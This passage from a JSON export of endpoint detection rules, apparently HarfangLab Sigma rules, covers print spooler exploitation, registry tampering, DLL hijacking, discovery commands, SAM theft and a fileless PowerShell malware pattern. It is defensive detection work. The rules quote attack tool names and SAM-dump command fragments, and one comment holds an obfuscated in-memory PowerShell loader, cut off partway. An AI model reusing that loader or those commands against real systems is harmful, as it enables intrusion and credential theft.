'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows 
*\\Drivers\\Version-?\\1234\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\12345\\Configuration File'\n # Quakbot (spider.dll)\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\123456\\Configuration File'\n # Mimikatz\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\mimikatz*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\\\*-legitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\\\*-reallylegitprinter\\Configuration File'\n selection_variant_cve_2022_21999:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\\\*\\CopyFiles\\Module'\n Details:\n # Used by SpoolFool to forcefully restart spoolsv.dll\n - '?:\\Windows\\System32\\AppVTerminator.dll'\n # Used by SpoolFool for its PoC\n - '*\\AddUser.dll'\n condition: selection_base and 1 of selection_variant_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7135edeb-86d3-4d04-a2e4-8eb48e25987c",
"rule_name": "Malicious Print Provider Added",
"rule_description": "Detects the registration, by spoolsv.exe, of a print driver configuration file or of a printer CopyFiles module whose name or path matches known exploitation tooling, via a registry value.\nThis can be the result of an exploitation of CVE-2021-1675 (aka PrintNightmare) or CVE-2022-21999 (aka SpoolFool) to gain code execution in spoolsv.\nThese vulnerabilities exist in the Windows Print Spooler service and allow remote or local code execution.\nAn attacker who successfully exploited one of them could run arbitrary code with SYSTEM privileges.\nNote that the detection relies on driver names and module paths used by public proof-of-concept tools, so a customized exploit may not be matched.\nIt is recommended to investigate the timeline for malicious activity and to look for any suspicious processes or alerts running as SYSTEM.\n",
"rule_creation_date": "2021-11-12",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7145827a-ffd8-421e-8a61-140558680892",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623054Z",
"creation_date": "2026-03-23T11:45:34.623056Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623061Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_registry_tools.yml",
"content": "title: Registry Tools Disabled\nid: 7145827a-ffd8-421e-8a61-140558680892\ndescription: |\n Detects the disabling of the use of Registry Tools for a said user.\n Attackers can use this registry modification to prevent users from starting registry tools and from doing remediative actions.\n It is recommended to investigate the process that did this registry modification and the context of this action to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n 
ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_userlock:\n ProcessOriginalFileName: 'UlAgent.dll'\n ProcessSignature: 'IS Decisions SA'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_mmc:\n ProcessCommandLine|startswith: '?:\\WINDOWS\\system32\\mmc.exe ?:\\Windows\\System32\\gpme.msc /s /gpobject:LDAP://'\n\n # https://www.aesis-conseil.com/\n exclusion_webkiosk:\n ProcessImage: '?:\\Program Files\\WkLock\\WkLockService.exe'\n\n exclusion_gpo_reporting:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{7F9BBC82-BA5F-4448-8622-EF76B8D007E6}'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_iaca:\n ProcessImage: '?:\\Windows\\SysWOW64\\SvCliaca.exe'\n ProcessCompany: 'IACASOFT'\n\n exclusion_azure:\n ProcessImage: '?:\\Windows\\System32\\dsregcmd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7145827a-ffd8-421e-8a61-140558680892",
"rule_name": "Registry Tools Disabled",
"rule_description": "Detects the disabling of Registry Tools for a given user, through the DisableRegistryTools policy value being set to a non-zero value.\nAttackers can use this registry modification to prevent users from starting registry tools and from performing remediation actions.\nNote that changes applied by the Group Policy client, by common management agents and by any binary located under Program Files are excluded.\nIt is recommended to investigate the process that performed this registry modification and the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71584c03-fa25-4f66-8f19-7d7be98df2de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075554Z",
"creation_date": "2026-03-23T11:45:34.075556Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075561Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_convert.yml",
"content": "title: DLL Hijacking via CONVERT.exe\nid: 71584c03-fa25-4f66-8f19-7d7be98df2de\ndescription: |\n Detects potential Windows DLL Hijacking via CONVERT.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONVERT.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ifsutil.dll'\n - '\\osuninst.dll'\n - '\\scecli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71584c03-fa25-4f66-8f19-7d7be98df2de",
"rule_name": "DLL Hijacking via CONVERT.exe",
"rule_description": "Detects potential Windows DLL hijacking via CONVERT.exe: a Microsoft-signed CONVERT.exe running from outside the Windows system directories loads ifsutil.dll, osuninst.dll or scecli.dll from a library that is neither located in those directories nor signed by Microsoft Windows.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a legitimate victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder, so that the malicious code runs under the identity of a trusted, signed binary.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "716e51d3-33b4-4ccb-88a4-aa86d0153c2a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621670Z",
"creation_date": "2026-03-23T11:45:34.621672Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621676Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_system_network_connections_discovered_linux.yml",
"content": "title: System Network Connections Discovered\nid: 716e51d3-33b4-4ccb-88a4-aa86d0153c2a\ndescription: |\n Detects the execution of commands to retrieve information about network connections.\n Attackers may use it during the discovery phase to display information about the system.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/21\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0039\n - attack.s0104\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n # For new agents, we use the correlation rule (e595008e-d87c-4a1b-a72c-3f9c72d68aca).\n AgentVersion|lt|version: 5.4.0\n CommandLine: 'sh -c netstat; who -a'\n\n condition: selection\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "716e51d3-33b4-4ccb-88a4-aa86d0153c2a",
"rule_name": "System Network Connections Discovered",
"rule_description": "Detects the execution of commands to retrieve information about network connections and logged-in users (netstat and who).\nAttackers may use them during the discovery phase to gather information about the system.\nNote that this rule only applies to agents older than version 5.4.0 and matches the exact command line used by the Atomic Red Team test for T1049; on newer agents this behavior is covered by a correlation rule.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "716e6c14-f88a-4b70-a62b-aa332b631bab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074729Z",
"creation_date": "2026-03-23T11:45:34.074731Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074735Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1003_002_powershell_sam_vss.yml",
"content": "title: SAM Dumped from a Volume Shadow Copy via PowerShell File::Copy\nid: 716e6c14-f88a-4b70-a62b-aa332b631bab\ndescription: |\n Detects the usage of a PowerShell script accessing the SAM (Security Account Manager) hive via a Volume Shadow Copy by using .NET's File::Copy API to copy the SAM database.\n After parsing it, an attacker could gain access to local account hashes.\n It is recommended to determine if this PowerShell script has a legitimate reason to do so, which is unlikely.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/12/13\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1003.002\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[System.IO.File]::Copy'\n - '\\\\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy'\n - 'Windows\\System32\\config\\SAM'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "716e6c14-f88a-4b70-a62b-aa332b631bab",
"rule_name": "SAM Dumped from a Volume Shadow Copy via PowerShell File::Copy",
"rule_description": "Detects a PowerShell script that copies the SAM (Security Account Manager) hive out of a Volume Shadow Copy, using .NET's System.IO.File::Copy API on a GLOBALROOT HarddiskVolumeShadowCopy device path.\nAfter parsing it, an attacker could gain access to local account password hashes.\nNote that the rule matches these exact string fragments in the PowerShell command; obfuscated variants may not be detected.\nIt is recommended to determine if this PowerShell script has a legitimate reason to do so, which is unlikely.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "719d9b93-0d7f-432a-9548-c653974e8c18",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295139Z",
"creation_date": "2026-03-23T11:45:35.295142Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295149Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1087_001_dscl_users_macos.yml",
"content": "title: Users Listed via Dscl\nid: 719d9b93-0d7f-432a-9548-c653974e8c18\ndescription: |\n Detects the execution of the dscl command to list all users.\n Attackers may use it during the discovery phase of an attack to retrieve the list of existing users.\n It is recommended to check for malicious behavior by the process launching dscl.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n # dscl . -list users\n # dscl . -list /Users\n # dscl . -list /Users/../Users\n # dscl . search /Users \"UserShell\" \"/bin/zsh\"\n Image: '/usr/bin/dscl'\n CommandLine|contains:\n - 'list '\n - 'search '\n ParentImage|contains: '?'\n\n selection_users:\n CommandLine|contains: 'users'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_airwatch:\n ParentImage: '/Library/Application Support/AirWatch/hubd'\n\n exclusion_filewave:\n - Ancestors|contains: '|/usr/local/sbin/FileWave.app/Contents/MacOS/fwcld|'\n - GrandparentCommandLine: '/bin/bash /private/var/FileWave/custom_field_script.sh'\n\n exclusion_munki:\n - GrandparentImage: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_landesk:\n GrandparentImage:\n - '/Library/Application Support/LANDesk/bin/ldiscan'\n - '/Library/Application Support/LANDesk/bin/ldapm'\n\n exclusion_ardagent:\n ProcessParentCommandLine|contains: '/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart'\n\n 
exclusion_fsecure:\n ParentCommandLine|endswith: '/usr/local/f-secure/bin/uninstall_MacProtection'\n\n exclusion_haxm:\n GrandparentImage: '/usr/local/haxm/haxm-launcher'\n\n exclusion_manageengine:\n GrandparentImage: '/Library/ManageEngine/UEMS_Agent/bin/dcinventory'\n\n exclusion_meraki:\n Ancestors|contains: '|/Library/Application Support/Meraki/m_agent|'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n exclusion_ninjarmm:\n ParentImage: '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n\n exclusion_parallels:\n Ancestors|contains: '/Applications/Parallels Desktop.app/Contents/MacOS/prl_client_app'\n\n exclusion_intune:\n Ancestors|contains: '|/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon|'\n\n exclusion_packagekit:\n Ancestors|contains: '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service|'\n\n exclusion_wazuh:\n Ancestors|contains: '/Library/Ossec/bin/wazuh-modulesd|'\n\n exclusion_installer:\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n condition: selection_base and selection_users and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "719d9b93-0d7f-432a-9548-c653974e8c18",
"rule_name": "Users Listed via Dscl",
"rule_description": "Detects the execution of the dscl command to list all users.\nAttackers may use it during the discovery phase of an attack to retrieve the list of existing users.\nIt is recommended to check for malicious behavior by the process launching dscl.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71c03cb7-362d-4076-95e6-72f3834cdd23",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085108Z",
"creation_date": "2026-03-23T11:45:34.085111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085115Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/FuzzySecurity/HackSysTeam-PSKernelPwn"
],
"name": "t1059_001_unknown_malicious_powershell.yml",
"content": "title: Generic Malicious PowerShell Payload Detected\nid: 71c03cb7-362d-4076-95e6-72f3834cdd23\ndescription: |\n Detects suspicious PowerShell command-line arguments used by an unknown fileless malware that reads an additional payload from the registry.\n Adversaries may use encoded PowerShell cmdlets to deploy staged payloads.\n It is recommended to check for malicious actions by child and parent processes of PowerShell and to look for other suspicious activities on the host.\nreferences:\n - https://github.com/FuzzySecurity/HackSysTeam-PSKernelPwn\ndate: 2021/12/20\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.Generic\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_loader_1:\n # $VaCs3fdEn = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Shell\";$A89Qc27sM0 = \"{009C12BA-9447-54BC-EA2080AE57C8148B}\";function LH3YNl12m{Param([OutputType([Type])][Parameter( Position = 0)][Type[]]$oCUkRh1v8 = (New-Object Type[](0)),[Parameter( Position = 1 )][Type]$DrFWIrAyX = [Void])$HZsTHC = [AppDomain]::CurrentDomain;$T1opS9Lis7 = New-Object System.Reflection.AssemblyName('ReflectedDelegate');$ryR9tOl = $HZsTHC.DefineDynamicAssembly($T1opS9Lis7, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);$JAROetsrFZ = $ryR9tOl.DefineDynamicModule('InMemoryModule', $false);$ZNXMFeI = $JAROetsrFZ.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$Dishyv6phR = $ZNXMFeI.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $oCUkRh1v8);$Dishyv6phR.SetImplementationFlags('Runtime, Managed');$sVRpoyL = $ZNXMFeI.DefineMethod('Invoke', 'Public, 
HideBySig, NewSlot, Virtual', $DrFWIrAyX, $oCUkRh1v8);$sVRpoyL.SetImplementationFlags('Runtime, Managed');Write-Output $ZNXMFeI.CreateType();}function g2WlK($HS1ZO, $tiiuai) {$IbsFQ6 = $HS1ZO[$tiiuai+0] * 16777216;$IbsFQ6 += $HS1ZO[$tiiuai+1] * 65536;$IbsFQ6 += $HS1ZO[$tiiuai+2] * 256;$IbsFQ6 += $HS1ZO[$tiiuai+3] * 1;return $IbsFQ6;}$LrV8DtVv = \"{0}IntPtr GetCurrentProcess();{0}IntPtr VirtualAlloc(IntPtr addr, uint size, uint type, uint prot);{0}bool WriteProcessMemory(IntPtr proc, IntPtr addr, byte[] buf, uint size, uint written);{0}uint SetErrorMode(uint mode);\" -f \"[DllImport(`\"kernel32.dll`\")]public static extern \";$yz7b7 = Add-Type -memberDefinition $LrV8DtVv -Name \"Win32\" -namespace Win32Functions -passthru;if (!$yz7b7) {Stop-Process -Force $PID;}function zvawmO952($LrV8DtVv, $LE9SaaFu7u, $LEsgFYY1Md) {$AM5Fw0fCuS = $yz7b7::GetCurrentProcess();$MHUHV = $yz7b7::VirtualAlloc(0,$LrV8DtVv.Length,0x00003000,0x40);$OMdlGR = $yz7b7::VirtualAlloc(0,$LEsgFYY1Md.Length,0x00003000,0x40);$yz7b7::WriteProcessMemory($AM5Fw0fCuS, $MHUHV, $LrV8DtVv, $LrV8DtVv.Length, 0) | Out-Null;$yz7b7::WriteProcessMemory($AM5Fw0fCuS, $OMdlGR, $LEsgFYY1Md, $LEsgFYY1Md.Length, 0) | Out-Null;$waEmkZRWoF = [IntPtr]($MHUHV.ToInt64()+$LE9SaaFu7u);$CiTgve = LH3YNl12m @([IntPtr], [IntPtr]) ([Void]);$qzYRF = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($waEmkZRWoF, $CiTgve);$yz7b7::SetErrorMode(0x8006) | Out-Null;$qzYRF.Invoke($OMdlGR, $MHUHV);}function W3F6u($sGkh0Zb6n, $PjFjESeo) {$UW2UgVXH = g2WlK $sGkh0Zb6n 1;$bolOl = 5;while ($bolOl+8 -lt $UW2UgVXH) {$sYG3eEIY5R = $sGkh0Zb6n[$bolOl];$QHLEHOG = g2WlK $sGkh0Zb6n ($bolOl+1);$xBpbyxhk0 = g2WlK $sGkh0Zb6n ($bolOl+5);$bolOl += 9;if ($sYG3eEIY5R -eq $PjFjESeo) {zvawmO952 $sGkh0Zb6n[$bolOl..($bolOl+$QHLEHOG)] $xBpbyxhk0 $sGkh0Zb6n;break;} else {$bolOl += $QHLEHOG;}}}$MIJKw26g = (Get-ItemProperty -Path \"$VaCs3fdEn\" -Name \"$A89Qc27sM0\" -ErrorAction SilentlyContinue).$A89Qc27sM0;if (!$MIJKw26g) {$MIJKw26g = 
